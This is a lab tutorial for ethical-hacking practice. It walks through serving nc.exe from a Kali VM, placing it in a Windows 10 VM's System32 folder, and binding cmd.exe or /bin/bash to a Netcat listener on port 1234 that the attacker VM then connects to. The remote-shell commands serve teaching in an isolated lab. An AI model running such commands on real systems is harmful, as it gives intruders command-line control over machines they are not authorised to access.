Setting Up Bind Shells Using Netcat

This guide focuses on configuring bind shells with nc.exe (Netcat), a versatile tool for ethical hacking and network diagnostics. Learn how to establish a direct connection between an attacker and a target machine, with practical, step-by-step instructions to enhance penetration testing skills while maintaining ethical standards.

Mahran Al-Zyoud
|
16 steps

Kali

Microsoft

- **Virtualization Software:** Oracle VirtualBox 7.1.4 - **Host Operating System:** Windows 11 - **Guest Operating Systems:** Kali Linux & Windows 10 - **Last Updated:** November 2024 - **Created by**: Mahran Al-Zyoud. For any improvements, corrections, or suggestions, please feel free to contact me at [mahran.alzyoud@gmail.com](mailto:mahran.alzyoud@gmail.com). Your feedback is appreciated!

**Netcat**, often nicknamed the "Swiss Army Knife" of networking, is an essential tool for ethical hackers and network security professionals. Among its many uses, Netcat is commonly employed to set up bind shells, which allow a target machine to listen for incoming connections from an attacker’s system. This method is particularly useful in penetration tests for simulating attacks that require a direct connection to the target system. In a **bind shell** setup, the target machine acts as the server, listening on a specific port for a connection request from the attacker. Once connected, the attacker gains remote command-line access to the system. This setup provides valuable insight into how unsecured systems can be exploited and highlights the importance of implementing proper network security measures, such as closing unused ports and restricting access with firewalls. This guide will walk you through configuring a bind shell using nc.exe, step by step. It emphasizes the ethical use of bind shells, ensuring all activities are authorized and conducted within the boundaries of legal penetration testing. By mastering bind shells, ethical hackers can better understand potential risks and develop strategies to secure vulnerable systems effectively.

Note: the first 10 steps below are exactly the same as those from the following guide: [Working with Remote Shells Using Netcat](https://scribehow.com/shared/Working_with_Remote_Shells_Using_Netcat__8LJbBAjRQPukT-SeNmfoSg)

Make sure that your Kali and Windows 10 VMs are running

Get the IP address of your Kali VM. This IP address should be part of the **RedTeamNet** Internal Network. Mine as shown below is 192.168.168.22

Launch a new instance of the Terminal by right-clicking on its icon as shown below.

Within Kali Linux, there are sets of pre-loaded Windows binary files that are useful to ethical hackers and penetration testers. One of these Windows-based binaries is Netcat for Windows. \ Let’s set up a Python-based web server on our Kali Linux virtual machine to transfer the Netcat file to the target system. On Kali Linux, use the commands shown below to set up a web server within the Windows binaries directory. Once the Python web server is running within the /usr/share/windows-binaries directory, any user that connects to Kali Linux on port 8080 will be able to view and download files from the directory.

Login to Windows 10 VM and get its IP address to confirm that it has one from the **RedTeamNet** Internal Network. Mine as shown below is 192.168.168.23

Launch a browser (e.g. Microsoft Edge) in the Windows 10 VM. Go to this URL: http://KALI_IP_ADDRESS:LISTENING_PORT. Replace KALI_IP_ADDRESS with your Kali VM's IP address, and if you followed step 4 above, use 8080 as the LISTENING_PORT. Click on **nc.exe** to download it.

When the download completes, click "**Show in folder**"

Right-click the downloaded file (nc) and select "**Copy**"

Go to C:\\Windows\\System32 and right-click there then select "**Paste**"

Click "**Continue**" **Note**: After downloading the file, you can quit the Python web server by pressing **Ctrl + Z** on the keyboard.

On the Windows 10 VM, open **Command Prompt** and use the command below\ to set up a Netcat listener on port 1234 that binds the Windows Command Prompt to the listener: [[nc -nlvp 1234 -e cmd.exe]] - \-n: to use the IP address only and not perform Domain Name System (DNS) queries - \-l: to listen for incoming connections - \-v: to use the verbose mode - \-p: to specify the listening port number - \-e: to execute a specified command after a connection is established. **Note 1**: When you use the 'e' option, Netcat launches the specified program or script and connects its input/output to the network socket. This allows you to interact with the command through the established connection. **Note 2**: If setting up the listener on a Linux system, the [[nc -nlvp 1234\\ -e /bin/bash]] command will enable you to bind the Windows Command Prompt to the listener using Netcat.

Now, run the following command from the Kali VM to connect to the service on Windows 10: [[nc -nv 192.168.168.23 1234]]

Check the output on Windows 10.